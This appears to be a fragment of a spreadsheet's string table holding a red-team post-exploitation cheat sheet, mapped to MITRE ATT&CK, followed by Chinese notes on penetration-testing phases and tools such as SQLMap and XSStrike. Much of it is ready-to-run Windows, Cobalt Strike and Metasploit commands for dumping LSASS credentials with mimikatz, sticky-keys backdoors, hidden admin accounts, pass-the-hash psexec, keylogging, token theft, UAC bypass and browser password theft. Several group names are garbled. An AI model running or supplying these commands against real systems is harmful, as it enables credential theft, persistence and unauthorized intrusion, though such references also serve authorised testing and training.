    <t>100028</t>
  </si>
  <si>
    <t>100029</t>
  </si>
  <si>
    <t>100030</t>
  </si>
  <si>
    <t>100031</t>
  </si>
  <si>
    <t>100032</t>
  </si>
  <si>
    <t>100033</t>
  </si>
  <si>
    <t>100034</t>
  </si>
  <si>
    <t>100035</t>
  </si>
  <si>
    <t>100036</t>
  </si>
  <si>
    <t>100037</t>
  </si>
  <si>
    <t>100038</t>
  </si>
  <si>
    <t>100039</t>
  </si>
  <si>
    <t>100040</t>
  </si>
  <si>
    <t>100041</t>
  </si>
  <si>
    <t>100042</t>
  </si>
  <si>
    <t>100043</t>
  </si>
  <si>
    <t>100044</t>
  </si>
  <si>
    <t>100045</t>
  </si>
  <si>
    <t>100046</t>
  </si>
  <si>
    <t>100047</t>
  </si>
  <si>
    <t>100048</t>
  </si>
  <si>
    <t>Blue Mockin50bird</t>
  </si>
  <si>
    <t>Bouncin50 50olf</t>
  </si>
  <si>
    <t>Cobalt 50roup</t>
  </si>
  <si>
    <t>Dra50onfly</t>
  </si>
  <si>
    <t>ida</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>50_id</t>
  </si>
  <si>
    <t>Dump credentials from LSASS</t>
  </si>
  <si>
    <t>cobalt-strike</t>
  </si>
  <si>
    <t>This technique injects into the LSASS.exe process and scrapes its memory for plaintext passwords of logged on users. You must do this from a high integrity process. 
The Mimikatz project has a lot of different capabilities (https://github.com/gentilkiwi/mimikatz/wiki) such as pass-the-hash, pass-the-ticket, creating silver/golden tickets, dumping credentials, and elevating a process.</t>
  </si>
  <si>
    <t>logonpasswords
mimikatz !sekurlsa::logonpasswords
mimikatz !sekurlsa::msv
mimikatz !sekurlsa::kerberos
mimikatz !sekurlsa::wdigest</t>
  </si>
  <si>
    <t>T1003</t>
  </si>
  <si>
    <t>use mimikatz
wdigest
msv
kerberos
logonpasswords</t>
  </si>
  <si>
    <t>Dumps hashes from the SAM Hive file</t>
  </si>
  <si>
    <t>Dumps hashes from the SAM Hive file.</t>
  </si>
  <si>
    <t>hashdump
mimikatz !lsadump::sam</t>
  </si>
  <si>
    <t>hashdump
run hashdump
run smart_hashdump
post/windows/gather/credentials/domain_hashdump</t>
  </si>
  <si>
    <t>Check terminal services</t>
  </si>
  <si>
    <t>Check for the current registry value for terminal services, if it's 0, then terminal services are enabled. If it's 1, then they're disabled</t>
  </si>
  <si>
    <t>reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections</t>
  </si>
  <si>
    <t>shell reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections</t>
  </si>
  <si>
    <t>reg queryval -k "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" -v fDenyTSConnections
post/windows/gather/enum_termserv</t>
  </si>
  <si>
    <t>Point sethc.exe file to cmd.exe</t>
  </si>
  <si>
    <t>Modify the registry to point the sethc.exe file to point to cmd.exe</t>
  </si>
  <si>
    <t>Sticky Keys Persistence via Registry Manipulations:
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f</t>
  </si>
  <si>
    <t>T1015</t>
  </si>
  <si>
    <t>Sticky Keys Persistence via Registry Manipulations:
shell REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f</t>
  </si>
  <si>
    <t>post/windows/manage/sticky_keys</t>
  </si>
  <si>
    <t>Replace real sethc.exe with a copy of cmd.exe</t>
  </si>
  <si>
    <t>Remove the real sethc.exe and replace it with a copy of cmd.exe. You can also just move the original sethc.exe to a different file if you don't want to delete it</t>
  </si>
  <si>
    <t>Sticky Keys Persistence via binary swapping:
takeown.exe C:\Windows\system32\sethc.exe
del C:\Windows\system32\sethc.exe
copy C:\Windows\system32\cmd.exe C:\Windows\system32\sethc.exe</t>
  </si>
  <si>
    <t>Sticky Keys Persistence via binary swapping:
shell takeown.exe C:\Windows\system32\sethc.exe
shell del C:\Windows\system32\sethc.exe
shell copy C:\Windows\system32\cmd.exe C:\Windows\system32\sethc.exe</t>
  </si>
  <si>
    <t>Get network information</t>
  </si>
  <si>
    <t>Get information about the domain, network adapters, DNS / WSUS servers</t>
  </si>
  <si>
    <t>T1016</t>
  </si>
  <si>
    <t>shell ipconfig</t>
  </si>
  <si>
    <t>ipconfig
post/windows/gather/enum_domains</t>
  </si>
  <si>
    <t>Get ARP table</t>
  </si>
  <si>
    <t>Display the ARP table</t>
  </si>
  <si>
    <t>arp -a
route print</t>
  </si>
  <si>
    <t>shell arp -a</t>
  </si>
  <si>
    <t>route</t>
  </si>
  <si>
    <t>Dump MAC, IP addresses and codes</t>
  </si>
  <si>
    <t>Used to get the MAC and IP addresses as well as some descriptive codes for machines (0x1C indicates a domain controller)</t>
  </si>
  <si>
    <t>shell c:\windows\sysnative\nbstat.exe -a {IP | COMP_NAME}</t>
  </si>
  <si>
    <t>Get the list of domain computers</t>
  </si>
  <si>
    <t>Display the list of domain computers in the domain by showing their computer accounts (COMP_NAME$)</t>
  </si>
  <si>
    <t>net group "Domain Computers" /domain</t>
  </si>
  <si>
    <t xml:space="preserve">
post/windows/gather/enum_ad_computers
post/windows/gather/enum_computers</t>
  </si>
  <si>
    <t>Get the list of domain controllers</t>
  </si>
  <si>
    <t>Display the list of domain controllers in the network</t>
  </si>
  <si>
    <t>net group "Domain Controllers" /domain</t>
  </si>
  <si>
    <t>Display trust relationship with domain controller</t>
  </si>
  <si>
    <t>Display the trust relationship between the workstation and the domain - must be elevated to use this!</t>
  </si>
  <si>
    <t>Display the login server</t>
  </si>
  <si>
    <t>Display the active directory login server of the workstation</t>
  </si>
  <si>
    <t>shell echo %LOGONSERVER%</t>
  </si>
  <si>
    <t>Get user information</t>
  </si>
  <si>
    <t>Get current user information, SID, domain, groups the user belongs to, security privs of the user</t>
  </si>
  <si>
    <t>shell whoami /all /fo list</t>
  </si>
  <si>
    <t>getuid</t>
  </si>
  <si>
    <t>Check for common privilege escalation methods</t>
  </si>
  <si>
    <t>PowerUp.ps1 is a powershell script from the PowerSploit project on github by PowershellMafia. The Invoke-AllChecks commandlet checks for many common privilege escalation options such as unquoted service paths, writeable service directories, service information manipulation, always install elevated, etc. Each specific kind of escalation technique supplies its own method of abusing it.</t>
  </si>
  <si>
    <t>Check for common privilege escalation methods:
*upload PowerUp.ps1 to victim disk*
powershell.exe -epbypass PowerUp.ps1
Invoke-AllChecks</t>
  </si>
  <si>
    <t>T1058
T1034
T1044
T1038</t>
  </si>
  <si>
    <t>powershell-import /path/to/PowerUp.ps1
powershell Invoke-AllChecks</t>
  </si>
  <si>
    <t>exploit/windows/local/trusted_service_path</t>
  </si>
  <si>
    <t>Create a new service remotely</t>
  </si>
  <si>
    <t>This technique creates a new service on the remote machine. It's important to note the spaces after the = in these commands! Also, before starting the service, run the following commands to make sure everything is set up properly:
sc \\COMP qc acachsrv
dir \\COMP\ADMIN$\acachsrv.exe</t>
  </si>
  <si>
    <t>Creating a new service remotely:
net use \\COMP\ADMIN$ "password" /user:DOMAIN_NAME\UserName
copy evil.exe \\COMP\ADMIN$\System32\acachsrv.exe
sc \\COMP create acachsrv binPath= "C:\Windows\System32\acachsrv.exe" start= auto  DisplayName= "DisplayName"
sc \\COMP start acachsrv</t>
  </si>
  <si>
    <t>T1035
T1077</t>
  </si>
  <si>
    <t>Creating a new service remotely:
shell net use \\COMP\ADMIN$ "password" /user:DOMAIN_NAME\UserName
shell copy evil.exe \\COMP\ADMIN$\acachsrv.exe
shell sc \\COMP create acachsrv binPath= "C:\Windows\System32\acachsrv.exe" start= auto description= "Description here" DisplayName= "DisplayName"
shell sc \\COMP start acachsrv</t>
  </si>
  <si>
    <t>Create a new service remotely (using psexec)</t>
  </si>
  <si>
    <t>psexec copies over a file to the remote box via SMB, then creates a service (usually a randomly named one) which points to the binary that was just copied over, starts the service, then deletes the service. Depending on the version of psexec, it might also migrate out of the initial process and delete the file that was copied over too. This is very similar to the previously mentioned technique of creating a service remotely, but the operator has much less control over the parameters</t>
  </si>
  <si>
    <t>psexec is part of the SysInternals suite. It's not on systems by default, but it is likely to be a trusted executable, especially on sysadmin boxes where other SysInternals tools already exist:
psexec /accepteula \\ip -u domain\user -p password -c -f \\smbip\share\file.exe (Copy and execute file.exe on the remote system)
psexec /accepteula \\ip -u domain\user -p  lm:ntlm cmd.exe /c dir c:\Progra~1 (Run cmd.exe on the remote system using the lm:ntlm password hash - aka pass the hash)
psexec /accepteula \\ip -s cmd.exe (Run cmd.exe on the remote box as the SYSTEM user account)</t>
  </si>
  <si>
    <t>psexec COMP_NAME {listener name} (via sc)
psexec_sh COMP_NAME {listener name} (via powershell)</t>
  </si>
  <si>
    <t>PSEXEC Modules:
exploit/windows/smb/psexec
exploit/windows/local/current_user_psexec
auxiliary/admin/smb/psexec_command
auxiliary/scanner/smb/psexec_loggedin_users
exploit/windows/smb/psexec_psh</t>
  </si>
  <si>
    <t>Get current TCP/IP connections</t>
  </si>
  <si>
    <t>Display current TCP/IP network connections (b requires elevated privs so you can see the process that opened the connection)</t>
  </si>
  <si>
    <t>shell c:\windows\sysnative\netstat.exe -ano[b]</t>
  </si>
  <si>
    <t>post/windows/gather/tcpnetstat</t>
  </si>
  <si>
    <t>Display active SMB sessions</t>
  </si>
  <si>
    <t>Display the list of active SMB sessions on the workstation so you can see which users have active connections.</t>
  </si>
  <si>
    <t>shell net session | find / "\\"</t>
  </si>
  <si>
    <t>post/windows/gather/enum_logged_on_users</t>
  </si>
  <si>
    <t>Display all currently scheduled tasks</t>
  </si>
  <si>
    <t>Displays all of the currently scheduled tasks to be run on a computer</t>
  </si>
  <si>
    <t>T1053</t>
  </si>
  <si>
    <t>shell schtasks</t>
  </si>
  <si>
    <t>Create a scheduled task</t>
  </si>
  <si>
    <t>Add scheduled task (/s is name/ip of remote system to do this on; /tn is the name of the task; /sc is when to run; /ru is user to runas; /rp is password for that user)
may need to make sure that the schedule service is started and configured to run on boot so that your persistence sticks.
Delete a scheduled task by name:
schtasks [/s HOSTNAME] /delete /tn "name"</t>
  </si>
  <si>
    <t>Creating a scheduled task:
schtasks [/S HOSTNAME] /create /tn "acachesrv" /tr C:\file\path\here.exe /sc ONLOGON /ru "System" [/rp password]
Requirements for running scheduled tasks:
net start schedule
sc config schedule start= auto</t>
  </si>
  <si>
    <t>Creating a scheduled task:
shell schtasks [/S HOSTNAME] /create /tn "acachesrv" /tr C:\file\path\here.exe /sc ONLOGON /ru "System" [/rp password]
Requirements for running scheduled tasks:
shell net start schedule
shell sc config schedule start= auto</t>
  </si>
  <si>
    <t>Start a keylogger</t>
  </si>
  <si>
    <t>Keylogging is extremely useful to get credentials and other information from the victim, but make sure that you are keylogging in a process belonging to the user you want to spy on. Keylogging within a SYSTEM process will not get you the keystrokes of other users on the system. For Cobalt Strike, make sure you specifiy the correct architecture and PID for a process running as the target victim. For Metasploit, make sure you've migrated to a process that is running as the target victim (explore.exe is always good).</t>
  </si>
  <si>
    <t>starting the keylogger:
keyscan_start
when you're ready to get the logs:
keyscan_dump
when you're done keylogging:
keyscan_stop</t>
  </si>
  <si>
    <t>T1056</t>
  </si>
  <si>
    <t>Enumerate running processes</t>
  </si>
  <si>
    <t>Display list of currently running processes and services on the system</t>
  </si>
  <si>
    <t>tasklist /v [/svc]
net start
qprocess *</t>
  </si>
  <si>
    <t>ps
shell tasklist /v [/svc]
shell net start</t>
  </si>
  <si>
    <t>ps
post/windows/gather/enum_services</t>
  </si>
  <si>
    <t>Elevate to SYSTEM level process</t>
  </si>
  <si>
    <t>This technique tries a series of exploits to elevate to a SYSTEM level process (these are actual exploits, not trust abuses, so there's always the potential for bluescreening)</t>
  </si>
  <si>
    <t>Enumerate local Admin accounts</t>
  </si>
  <si>
    <t>Display the list of local administrator accounts on the workstation</t>
  </si>
  <si>
    <t>T1069</t>
  </si>
  <si>
    <t>shell net localgroup "Administrators"</t>
  </si>
  <si>
    <t>post/windows/gather/local_admin_search_enum</t>
  </si>
  <si>
    <t>Get domain admin accounts</t>
  </si>
  <si>
    <t>Display the list of domain administrator accounts</t>
  </si>
  <si>
    <t>net group ["Domain Admins"] /domain</t>
  </si>
  <si>
    <t>domain_list_gen.rb
post/windows/gather/enum_domain_group_users</t>
  </si>
  <si>
    <t>Enable RDP Services</t>
  </si>
  <si>
    <t>Enable RDP via the registry and services</t>
  </si>
  <si>
    <t>Enable RDP Services:
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 
net start TermService</t>
  </si>
  <si>
    <t>T1076</t>
  </si>
  <si>
    <t>Enable RDP Services:
shell REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
shell reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 
shell net start TermService</t>
  </si>
  <si>
    <t>post/windows/manage/enable_rdp</t>
  </si>
  <si>
    <t>Get available shares</t>
  </si>
  <si>
    <t>Used to view network shared resource information, add a new network resource, and remove an old network resource from the computer. Run this against computers discovered from the previous two commands to view the shares that are available on them.</t>
  </si>
  <si>
    <t>net use [\\ip\path] [password] [/user:DOMAIN\user]
net use \\COMP\ADMIN$ password /user:COMP\Administrator (checking password reuse on local admin account)</t>
  </si>
  <si>
    <t>T1077</t>
  </si>
  <si>
    <t>shell net use [\\ip\path] [password] [/user:DOMAIN\user]</t>
  </si>
  <si>
    <t>Collect passwords from web browsers</t>
  </si>
  <si>
    <t>https://github.com/AlessandroZ/LaZagne (now part of pupy as a post-exploit module)
This program attempts to collect passwords from many different data sources related to browsers - it'll get passwords from Firefox, Chrome, Opera, IE.
the -f command on the browsers command call is specifically targeting Firefox</t>
  </si>
  <si>
    <t>shell laZagne.exe browsers [-f]</t>
  </si>
  <si>
    <t>T1081</t>
  </si>
  <si>
    <t>open source</t>
  </si>
  <si>
    <t>https://github.com/hassaanaliw/chromepass
This program attempts to collect passwords that Chrome stores.</t>
  </si>
  <si>
    <t>To print output simply: python chromepass.py -d
To write to csv file: python chromepass.py --o csv
To write to json file: python chromepass.py --o json</t>
  </si>
  <si>
    <t>Get Windows version</t>
  </si>
  <si>
    <t>Get the Windows OS version that's running</t>
  </si>
  <si>
    <t>shell ver</t>
  </si>
  <si>
    <t>Print environment variables</t>
  </si>
  <si>
    <t>Print all of the environment variables</t>
  </si>
  <si>
    <t>shell set</t>
  </si>
  <si>
    <t>get_env.rb</t>
  </si>
  <si>
    <t>Get computer information</t>
  </si>
  <si>
    <t>Get computer name, username, OS software version, domain information, DNS, logon domain</t>
  </si>
  <si>
    <t>net config workstation
net config server</t>
  </si>
  <si>
    <t>shell net config workstation
shell net config server</t>
  </si>
  <si>
    <t>Get configuration information</t>
  </si>
  <si>
    <t>Displays detailed configuration information about a computer and its operating system, including operating system configuration, security information, product ID, and hardware properties, such as RAM, disk space, and network cards</t>
  </si>
  <si>
    <t>systemprofiler tool if no access yet (victim browses to website)
or
shell systeminfo (if you already have a beacon)</t>
  </si>
  <si>
    <t>sysinfo, run winenum, get_env.rb</t>
  </si>
  <si>
    <t>Gather more information on targeted users</t>
  </si>
  <si>
    <t>Used to add, delete, and manage the users on the computer. Run this command on the users discovered from the previous two commands to gather more information on targeted users.</t>
  </si>
  <si>
    <t>T1087</t>
  </si>
  <si>
    <t>shell net user [username] [/domain]</t>
  </si>
  <si>
    <t>post/windows/gather/enum_ad_users
auxiliary/scanner/smb/smb_enumusers</t>
  </si>
  <si>
    <t>Query Active Directory for users, groups and permissions</t>
  </si>
  <si>
    <t>Dsquery is a Windows utility on servers that facilitates querying the Active Directory of the domain for lots of information about users, groups, and permissions. When constructing dsquery commands, if your domain is "subdomain.domain.tld", then your query will include "dc=subdomain,dc=domain,dc=tld"</t>
  </si>
  <si>
    <t>dsquery group "ou=Domain Admins,dc=domain,dc=com"
dsquery user "dc=domain,dc=com"
dsquery * OU="Domain Admins",DC=domain,DC=com -scope base -attr SAMAccountName userPrincipalName Description
dsquery * -filter "(&amp;(objectCategory=contact)(objectCategory=person)(mail=*)(objectClass=user))" -Attr samAccountName mail -Limit 0
dsquery * -filter "(&amp;(objectCategory=group)(name=*Admin*))" -Attr name description members</t>
  </si>
  <si>
    <t>shell dsquery group "out=Domain Admins",dc=domain,dc=com"
shell dsquery user "dc=domain,dc=com"
shell dsquery * OU="Domain Admins",dc=domain,dc=com -scope base -attr SAMAccountName userPrincipleName Description
shell dsquery * -filter "(&amp;(objectCategory=contact)(objectCategory=person)(mail=*)(objectClass=user))" -Attr samAccountName mail -Limit 0
shell dsquery * -filter "(&amp;(objectCategory=group)(name=*Admin*))" -Attr name description members</t>
  </si>
  <si>
    <t>Bypass UAC</t>
  </si>
  <si>
    <t>If you have a medium integrity process, but are an administrator, UACBypass will get you a high integrity process without prompting the user for confirmation.</t>
  </si>
  <si>
    <t>T1088</t>
  </si>
  <si>
    <t>One of the following:
exploit/windows/local/bypassuac
exploit/windows/local/bypassuac_injection
exploit/windows/local/bypassuac_vbs</t>
  </si>
  <si>
    <t>Token stealing</t>
  </si>
  <si>
    <t>This steals the access token from another process and uses it to gain access to other services or computers. In Cobalt Strike, this token is only used when accessing remote systems, but in Meterpreter, this token is used for everything until it's dropped via rev2self. You need to be in a high integrity process for this to work.</t>
  </si>
  <si>
    <t>Token Stealing:
steal_token pid#</t>
  </si>
  <si>
    <t>T1134</t>
  </si>
  <si>
    <t>Token Stealing:
use incognito
list_tokens -u
impersonate_token DOMAIN\\User
or:
steal_token {pid}</t>
  </si>
  <si>
    <t>Dump network shared resource information</t>
  </si>
  <si>
    <t>Used to view network shared resource information, share a new network resource, and remove an old shared network resource from the workstation. Not for remote queries</t>
  </si>
  <si>
    <t>auxiliary/scanner/smb/smb_enumshares</t>
  </si>
  <si>
    <t>List of workstations and network devices</t>
  </si>
  <si>
    <t>Display the list of workstations and network devices on the network.</t>
  </si>
  <si>
    <t>net view \\host /domain</t>
  </si>
  <si>
    <t>Create backdoor user account</t>
  </si>
  <si>
    <t>Create a backdoor user account that often appears on windows systems and add that user to the local administrators group and the remote desktop users group. This combined with the sticky keys persistence grants an inocuous system level persistence mechanism.</t>
  </si>
  <si>
    <t>Add backdoor user account:
net user support_388945a0 somepasswordhere /add /y
net localgroup administrators support_388945a0 /add
net localgroup "remote desktop users" support_388945a0 /add</t>
  </si>
  <si>
    <t>T1136</t>
  </si>
  <si>
    <t>post/windows/manage/add_user_domain</t>
  </si>
  <si>
    <t>Add backdoor user account:
shell net user support_388945a0 somepasswordhere /add /y
shell net localgroup administrators support_388945a0 /add
shell net localgroup "remote desktop users" support_388945a0 /add</t>
  </si>
  <si>
    <t>Enable "support_388945a0" account</t>
  </si>
  <si>
    <t>If the support_388945a0 account already exists on the system, but is disabled, you can enable it and then add it to the necessary groups.</t>
  </si>
  <si>
    <t>Enable backdoor user account:
net user support_388945a0 /active:yes
net localgroup administrators support_388945a0 /add
net localgroup "remote desktop users" support_388945a0 /add</t>
  </si>
  <si>
    <t>Enable backdoor user account:
shell net user support_388945a0 /active:yes
shell net localgroup administrators support_388945a0 /add
shell net localgroup "remote desktop users" support_388945a0 /add</t>
  </si>
  <si>
    <t>name</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>description</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.前期交互</t>
  </si>
  <si>
    <t>内容：在前期交互阶段，渗透测试团队与客户组织进行交互讨论，最重要的是确定渗透测试的范围、目标、限制条件以及服务合同细节。
目标：确定方法、确定范围</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.信息收集</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">内容：根据确定的渗透测试目标以及范围，使用各种手段尽可能的收集与测试目标相关的信息。例如开源情报(OSINT)、GoogleHacking、扫描探测等。收集到的信息越充分对之后的渗透测试越有利。
目标：外围信息：子域名、兄弟域名、所属域名、代码托管平台、搜索引擎搜索、网络空间搜索；服务器信息：IP信息、系统信息、旁站信息、idc信息、操作系统、开放服务；网络信息：网络设备、边界设备、防护设备、拓扑结构、应用架构、指纹识别；业务信息：线上业务、业务相关、业务逻辑、人力资源、社会关系、信息相关。
范围：系统信息、业务信息
</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3.漏洞探测</t>
  </si>
  <si>
    <t>高危：弱口令、SQL注入漏洞、XSS跨站漏洞、文件上传漏洞、命令执行漏洞、文件包含漏洞、WebDAV漏洞、文件包含漏洞、任意文件下载、编辑器漏洞、敏感文件泄露、CSRF漏洞、解析漏洞、逻辑漏洞、历史遗留后门、远程部署漏洞
中危：目录浏览漏洞、CGI信息泄露漏洞、IIS短文件名信息泄露漏洞、服务器环境探针文件、日志信息文件、JSP示例文件
低危：站程序调试信息、后台登录地址、服务端统计信息文件、敏感目录、内容泄露漏洞</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>4.渗透攻击</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>入侵攻击,获取权限</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>5.后渗透</t>
  </si>
  <si>
    <t>1.权限提升:提权；2.信息收集:服务器信息,sniff数据包(svn,http,ftp等) ,hash,关闭防火墙杀毒软件；3.内网渗透:开启3389 ,端口转发,代理/跳跳板攻击；4.后门植入:永久后门维持权限。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>6.渗透报告</t>
  </si>
  <si>
    <t>包含内容：漏洞详细、加固建议</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>黑盒测试</t>
  </si>
  <si>
    <t>黑盒测试也称为外部测试。在进行黑盒测试时候，事先假定渗透测试人员先期对目标网络的内部结构和所使用的程序完全不了解，从网络外部对其网络安全进行评估。黑盒测试中需要耗费大量的时间来完成对目标信息的收集。除此之外，黑盒测试对渗透测试人员的要求也是最高的。</t>
  </si>
  <si>
    <t>白盒测试</t>
  </si>
  <si>
    <t>白盒测试也称为内部测试。在进行白盒测试的时候，渗透测试人员必须事先清楚的知道被测试环境的内部结构和技术细节。相比黑盒测试，白盒测试的目标是明确定义好的，因此，白盒测试无需进行目标范围定义、信息收集等操作。这种测试的目标都是某个特定业务对象，因此相比黑盒测试，白盒测试能给用户目标带来更大的价值。</t>
  </si>
  <si>
    <t>灰盒测试</t>
  </si>
  <si>
    <t>将白盒测试和黑盒测试组合使用，就是灰盒测试。在进行灰盒测试时，渗透测试人员只能了解部分目标网络的信息，但不会掌握网络内部工作原理和限制信息。</t>
  </si>
  <si>
    <t>ns0__工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>EyeWitness</t>
  </si>
  <si>
    <t>可用于网站截图，以及提供一些服务器头信息，并在可能的情况下识别默认凭据。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>AWSBucketDump</t>
  </si>
  <si>
    <t>AWS S3安全扫描工具，允许你快速枚举AWS S3 buckets以查找有趣或机密的文件。</t>
  </si>
  <si>
    <t>AQUATONE</t>
  </si>
  <si>
    <t>子域名枚举探测工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>spoofcheck</t>
  </si>
  <si>
    <t>检查域是否可以被欺骗</t>
  </si>
  <si>
    <t>Nmap</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>用于发现计算机网络上的主机和服务。</t>
  </si>
  <si>
    <t>dnsrecon</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DNS枚举脚本。</t>
  </si>
  <si>
    <t>SQLIer</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SQLIer可以找到网站上一个有SQL注入漏洞的URL，并根据有关信息来生成利用SQL注入漏洞,但它不要求用户的交互。通过这种方法，它可以生成一个UNION SELECT查询，进而可以强力攻击数据库口令。这个程序在利用漏洞时并不使用引号，这意味着它可适应多种网站。
SQLIer通过“true/false”SQL注入漏洞强力口令。借助于“true/false” SQL注入漏洞强力口令，用户是无法从数据库查询数据的，只能查询一个可返回“true”、“false”值的语句。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SQLID</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SQLID是一个SQL注入漏洞挖掘器，是一个命令行实用程序，它能够查找SQL注入漏洞和网站中的常见错误。它可以执行以下几种操作：查找网页中的SQL注入漏洞，测试提交的表单，查找SQL注入漏洞的可能性。它还支持HTTP、HTTPS、基本身份验证等。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SQLMap</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SQLMap用python开发，它能执行一个动态的数据库管理系统指纹识别，可以完整地穷举远程数据库。其目标是实施一个完整的功能性数据库管理系统工具，它能够利用Web应用程序程序设置的全部缺陷，这些安全缺陷可以导致SQL注入漏洞。
在SQLMap检测到目标系统上的一个或多个SQL注入漏洞之后，用户就可以从多种选项中选择，进而执行全面的后端数据库管理系统指纹识别，检索数据库管理系统会话用户和数据库，穷举用户、口令哈希、数据库，运行其自身的SQL SELECT语句，读取文件系统上的特定文件等。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SQL Power Injector</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SQL Power Injector可帮助渗透测试人员找到并利用网页上的漏洞。目前，它支持SQL Server、Oracle、MYSQL、Sybase/Adaptive Sever和DB2等数据库，但在使用inline注入时，还可借助现有的数据库管理系统来使用此软件。
其自动化的工作模式以两种方式进行，一是比较期望的结果，二是根据时间延迟。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SQLNinja</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Sqlninja可以利用以SQL Server为后端数据支持的应用程序的漏洞，其主要目标是提供对有漏洞的数据库服务器的远程访问。Sqlninja的行为受到配置文件的控制，它告诉了Sqlninja攻击的目标和方式，还有一些命令行选项。比如，有如下一些命令选项：
－m&lt;攻击模式&gt;,其攻击模式有测试（test）、指纹识别（fingerprint）、强力攻击（bruteforce）等；
其它的命令选项，-v : 指明进行详细输出；-f&lt;配置文件&gt;：指明一个使用的配置文件。-w&lt;单词列表&gt;指明以强力攻击模式使用的单词列表。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Xsser</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Xsser是一个自动框架，检测，利用和报告基于Web应用XSS漏洞。它包含几个选项，试图绕过某些过滤器，以及各种特殊的代码注入技术。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>AWVS</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Acunetix Web Vulnerability Scanner（AWVS）可以扫描任何通过Web浏览器访问和遵循HTTP/HTTPS规则的Web站点。适用于任何中小型和大型企业的内联网、外延网和面向客户、雇员、厂商和其它人员的Web网站。AWVS可以通过检查SQL注入攻击漏洞、XSS跨站脚本攻击漏洞等漏洞来审核Web应用程序的安全性。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>AppScan</t>
  </si>
  <si>
    <t>IBM AppScan是一款非常好用且功能强大的Web 应用安全测试工具，曾以 Watchfire AppScan 的名称享誉业界，Rational AppScan 可自动化 Web 应用的安全漏洞评估工作，能扫描和检测所有常见的 Web 应用安全漏洞，例如 SQL 注入（SQL-injection）、跨站点脚本攻击（cross-site scripting）、缓冲区溢出（buffer overflow）及最新的 Flash/Flex 应用及 Web 2.0 应用曝露等方面安全漏洞的扫描。欢迎有需要的朋友们前来下载使用。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>XSSstrik</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>XSStrike 是一款用于探测并利用XSS漏洞的脚本。
XSStrike目前所提供的产品特性：对参数进行模糊测试之后构建合适的payload；使用payload对参数进行穷举匹配；内置爬虫功能；检测并尝试绕过WAF；同时支持GET及POST方式；大多数payload都是由作者精心构造；误报率极低；debian及kali系统可直接下载 本.deb安装包；通用安装方法。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CheckXSS</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CheckXSS 并非采用传统的模糊测试，而是依次测试目标网站对敏感字符、HTML标签、标签事件、事件方法的过滤情况，然后根据以上测试结果动态生成攻击载荷（payload）以完成接下来的测试，这样可以避免很多无效 Payload 测试，大大提升检测效率。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>FUSE</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
